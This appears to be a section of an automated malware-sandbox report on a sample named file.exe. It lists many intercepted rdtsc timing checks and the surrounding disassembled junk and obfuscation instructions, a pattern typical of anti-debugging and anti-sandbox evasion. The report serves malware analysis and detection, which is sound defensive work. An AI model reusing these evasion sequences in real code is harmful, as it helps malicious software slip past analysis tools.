Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC35 second address: CEEC96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F1674F90E18h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov si, 87F0h 0x0000002c push 00000000h 0x0000002e jmp 00007F1674F90E25h 0x00000033 push C52C45DCh 0x00000038 pushad 0x00000039 pushad 0x0000003a push ecx 0x0000003b pop ecx 0x0000003c push eax 0x0000003d pop eax 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC96 second address: CEEC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEC9A second address: CEECFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3AD3BAA4h 0x0000000e add edx, 79098B00h 0x00000014 mov dword ptr [ebp+122D1BA9h], ebx 0x0000001a push 00000003h 0x0000001c movsx edx, dx 0x0000001f push 00000000h 0x00000021 jno 00007F1674F90E1Bh 0x00000027 add cx, 79EEh 0x0000002c mov dx, cx 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F1674F90E18h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push ECE973F1h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEECFA second address: CEED04 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEED8C second address: CEEE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1674F90E1Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor dword ptr [ebp+122D1D0Dh], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F1674F90E18h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push B039E4F8h 0x00000035 pushad 0x00000036 jmp 00007F1674F90E27h 0x0000003b jng 00007F1674F90E29h 0x00000041 jmp 00007F1674F90E23h 0x00000046 popad 0x00000047 add dword ptr [esp], 4FC61B88h 0x0000004e jmp 00007F1674F90E21h 0x00000053 push 00000003h 0x00000055 push 00000000h 0x00000057 mov ch, dh 0x00000059 push 00000003h 0x0000005b mov edx, 2084BF74h 0x00000060 call 00007F1674F90E19h 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEE33 second address: CEEE44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEE44 second address: CEEEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E20h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F1674F90E25h 0x00000018 jmp 00007F1674F90E1Ch 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 pushad 0x00000023 jmp 00007F1674F90E25h 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEA1 second address: CEEEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEAF second address: CEEEB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEB3 second address: CEEEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEEB9 second address: CEEF5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e jng 00007F1674F90E18h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F1674F90E18h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 ja 00007F1674F90E29h 0x00000038 lea ebx, dword ptr [ebp+124509D3h] 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F1674F90E18h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 movzx edi, ax 0x0000005b xchg eax, ebx 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007F1674F90E26h 0x00000063 pop eax 0x00000064 pushad 0x00000065 push esi 0x00000066 pop esi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEF5D second address: CEEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEF69 second address: CEEF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEEF6E second address: CEEF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E285 second address: D0E289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E289 second address: D0E297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1675279DA8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E297 second address: D0E2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E2A4 second address: D0E2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1675279DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F1675279DA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E2B9 second address: D0E2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E529 second address: D0E57C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1675279DB8h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c je 00007F1675279DA6h 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007F1675279DA6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 pushad 0x00000021 je 00007F1675279DA6h 0x00000027 jmp 00007F1675279DB7h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E57C second address: D0E5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F1674F90E16h 0x00000013 pushad 0x00000014 jmp 00007F1674F90E20h 0x00000019 ja 00007F1674F90E16h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EB57 second address: D0EB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EB6B second address: D0EB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EE95 second address: D0EEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EEA0 second address: D0EEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0EFE3 second address: D0F01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DACh 0x00000009 jmp 00007F1675279DB8h 0x0000000e jg 00007F1675279DA6h 0x00000014 popad 0x00000015 pushad 0x00000016 jl 00007F1675279DA6h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F01D second address: D0F023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F023 second address: D0F043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1675279DB7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F043 second address: D0F047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F2CA second address: D0F2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F413 second address: D0F41D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F41D second address: D0F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F423 second address: D0F42D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F42D second address: D0F431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0716C second address: D07172 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07172 second address: D0717D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0717D second address: D07188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D07188 second address: D0718E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F5AF second address: D0F5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F5B6 second address: D0F5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F1675279DA6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DAFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0F5D2 second address: D0F5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FBAA second address: D0FBFB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DCCh 0x00000008 jmp 00007F1675279DADh 0x0000000d jmp 00007F1675279DB9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F1675279DBFh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FEC3 second address: D0FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1674F90E16h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FECE second address: D0FF04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1675279DACh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F1675279DB7h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FF04 second address: D0FF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0FF08 second address: D0FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DAEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1008D second address: D10091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D10091 second address: D100A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1675279DACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D100A1 second address: D100A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D12DF1 second address: D12DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D156C5 second address: D156CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D156CF second address: D156D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BEEC second address: D1BEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BEF2 second address: D1BEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1BEFB second address: D1BF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1674F90E1Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E28h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C35F second address: D1C380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB3h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C380 second address: D1C385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1C385 second address: D1C3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a jmp 00007F1675279DAFh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D209 second address: D1D26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1674F90E1Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 1D091A3Dh 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1674F90E18h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D394Eh] 0x00000034 pushad 0x00000035 mov ecx, 1F15945Bh 0x0000003a mov edi, dword ptr [ebp+122D365Ah] 0x00000040 popad 0x00000041 mov esi, dword ptr [ebp+122D37B2h] 0x00000047 push 30C13DCCh 0x0000004c push eax 0x0000004d push edx 0x0000004e jp 00007F1674F90E18h 0x00000054 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D5C7 second address: D1D5D1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D8C7 second address: D1D8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1D8CC second address: D1D8D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DDC0 second address: D1DDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1674F90E16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DE67 second address: D1DE6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DE6D second address: D1DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1DE71 second address: D1DE82 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E107 second address: D1E116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F1674F90E1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1E285 second address: D1E28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F930 second address: D1F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F934 second address: D1F949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1F949 second address: D1F954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209EC second address: D209F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209F2 second address: D209F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209F8 second address: D209FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D209FC second address: D20A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F1674F90E18h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D1920h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F1674F90E18h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b or dword ptr [ebp+122D17C0h], edi 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 jmp 00007F1674F90E26h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D23037 second address: D2305A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1675279DA6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D22DC1 second address: D22DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2503F second address: D25051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DABh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D25051 second address: D25055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A466 second address: D2A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2B3EF second address: D2B3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A67F second address: D2A683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2A683 second address: D2A691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1674F90E1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D2B5F4 second address: D2B5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
